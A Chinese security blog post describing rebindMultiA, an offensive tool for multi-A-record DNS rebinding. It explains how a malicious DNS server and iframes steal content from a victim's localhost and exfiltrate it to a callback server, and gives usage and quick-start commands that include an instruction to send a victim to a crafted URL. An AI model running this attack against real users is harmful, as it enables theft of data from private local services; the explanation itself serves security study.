Eswlnk Blog Eswlnk Blog
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈
  • 注册
  • 登录
首页 › 渗透分析 › RebindMultiA | 执行多个 A 记录重新绑定攻击的工具

RebindMultiA | 执行多个 A 记录重新绑定攻击的工具

Eswlnk的头像
Eswlnk
2023-05-27 17:04:49
RebindMultiA | 执行多个 A 记录重新绑定攻击的工具-Eswlnk Blog
智能摘要 AI
文章介绍了`rebindMultiA`工具及其用于执行多A记录重新绑定攻击的技术细节。这种攻击是DNS欺骗的一种变种,通过配置恶意DNS服务器返回两个IP地址(如`13.33.33.37`和`127.0.0.1`),利用浏览器在第一个IP不可用时切换到第二个IP的行为,实现跨域资源窃取。攻击过程中,受害者浏览器首先连接到外部IP上的恶意HTTP服务器,随后被重定向至本地IP,从而绕过同源策略窃取敏感信息。该攻击仅限于Windows环境,Linux和Mac系统因优先使用私有IP而无法触发。文章还提供了工具的安装、运行及使用示例代码,强调了对Python版本的要求(需3.7及以上)。

rebindMultiA是执行多 A 记录重新绑定攻击的工具。

rebindmultia.com是我为协助这些攻击而设​​置的域。它使每个 IP 成为该域的自己的权威名称服务器[IP].ns.rebindmultia.com。例如,13.33.33.37.ns.rebindmultia.com的权威名称服务器13.33.33.37.ip.rebindmultia.com解析(如您可能已经猜到的那样)为13.33.33.37.

多次 A 记录重新绑定攻击

MultiA Record Rebind 攻击是 DNS Rebinding 的一种变体,它利用攻击者使用两个 IP 地址响应 DNS 请求的能力,以及浏览器在第一个不响应时回退到 DNS 响应中的第二个 IP 的倾向. 在这次攻击中,攻击者会配置一个恶意的DNS服务器和两个恶意的HTTP服务器。DNS 服务器将响应两个 A 记录:

127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1

然后,受害者浏览器将连接到第一个 IP,并开始与攻击者的第一个恶意 HTTP 服务器进行交互。该服务器将响应一个包含两个 iframe 的页面,一个到/steal,一个到/rebind。iframe/steal将加载恶意页面以进入第二个 iframe 并获取内容。端点/rebind在命中时将发出 302 重定向/并杀死第一个恶意 HTTP 服务器。结果,当浏览器返回到攻击者的 HTTP 服务器时,它将遇到一个关闭的端口。因此,它将回退到第二个 IP. 一旦目标内容加载到第二个 iframe 中,第一个 iframe 就可以进入其中,窃取数据,并将其泄露到攻击者的第二个恶意 HTTP 服务器——回调服务器。

此攻击仅适用于Windows环境。 Linux和Mac会默认优先使用私有IP,永远不会查询到攻击者的服务器。

图文+讲解

RebindMultiA | 执行多个 A 记录重新绑定攻击的工具-Eswlnk Blog
  1. 浏览器解析主机127.0.0.1.target.13.33.33.37.ns.rebindmultia.com。
  2. DNS服务器(包含在server.py)解析请求的dns名称,返回两条A记录:13.33.33.37和127.0.0.1。
  3. 受害者的浏览器连接到攻击者的恶意 HTTP 服务器(包含在 中server.py)并加载/parent具有两个 iframe 的页面。
  4. 受害者的浏览器/steal从攻击者的恶意 HTTP 服务器加载。
  5. 受害者的浏览器加载/rebind导致 302 重定向到/(HTTP 服务器将在此请求后退出)。
  6. 受害者的浏览器重定向到/攻击302者的服务器。
  7. 受害者的浏览器尝试从攻击者的(现已失效)HTTP 服务器加载/,但未能成功。
  8. 然后浏览器转移到DNS 缓存中的第二个127.0.0.1IP,并将主机名解析为. 然后它会连接到该服务器并加载 iframe 中的页面。
  9. 攻击者的stealiframe 进入新加载的第二个 iframe 并获取内容。
  10. 攻击者的stealiframe 然后将结果发送回攻击者的回调服务器。

用法

pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]

optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /

如果您收到此错误:

┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]
╰─>$ python3 server.py

Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'

然后你需要使用更新版本的 Python。Python 3.7+。

快速开始

这必须从可公开访问的 IP 执行。

git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py
本站默认网盘访问密码:1166
本站默认网盘访问密码:1166
声明:本站原创文章文字版权归本站所有,转载务必注明作者和出处;本站转载文章仅仅代表原作者观点,不代表本站立场,图文版权归原作者所有。如有侵权,请联系我们删除。
DNS攻防对抗网络攻击
0
0
Eswlnk的头像
Eswlnk
一个有点倒霉的研究牲站长
赞赏
LimeRAT 恶意软件分析之提取配置
上一篇
用于无密码登录的 Google 支持密钥
下一篇

评论 (0)

请登录以参与评论
现在登录
    发表评论

猜你喜欢

  • 「漏洞资讯」CVE-2025-12914:宝塔面板曝出注入漏洞
  • 今日热点:伪Clash软件下载陷阱曝光,附防范建议
  • 「攻防对抗」利用 fastjson 原生反序列化与动态代理突破安全限制
  • 「攻防对抗」从上传漏洞到Getshell | 一次完整的渗透过程
  • 「日志记录」从零起步揭开路由器漏洞挖掘的面纱
Eswlnk的头像

Eswlnk

一个有点倒霉的研究牲站长
1108
文章
319
评论
679
获赞

随便看看

「行业资讯」Dark Frost 僵尸网络对游戏行业发起毁灭性的 DDoS 攻击
2023-05-26 0:14:21
「漏洞资讯」多用户管理系统API接口调用存在前台SQL注入漏洞(0day)
2024-11-09 13:31:53
「渗透分析」有关DLL劫持原理的解析
2022-08-20 16:09:54

文章目录

专题展示

WordPress53

工程实践37

热门标签

360 AI API CDN java linux Nginx PDF PHP python SEO Windows WordPress 云服务器 云服务器知识 代码 免费 安全 安卓 工具 开发日志 微信 微软 手机 插件 攻防 攻防对抗 教程 日志 渗透分析 源码 漏洞 电脑 破解 系统 编程 网站优化 网络 网络安全 脚本 苹果 谷歌 软件 运维 逆向
  • 首页
  • 知识库
  • 地图
Copyright © 2023-2025 Eswlnk Blog. Designed by XiaoWu.
本站CDN由 壹盾安全 提供高防CDN安全防护服务
蜀ICP备20002650号-10
页面生成用时 0.842 秒   |  SQL查询 27 次
本站勉强运行:
友情链接: Eswlnk Blog 网站渗透 倦意博客 特资啦!个人资源分享站 祭夜博客 iBAAO壹宝头条
  • WordPress142
  • 网络安全64
  • 漏洞52
  • 软件52
  • 安全48
现在登录
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈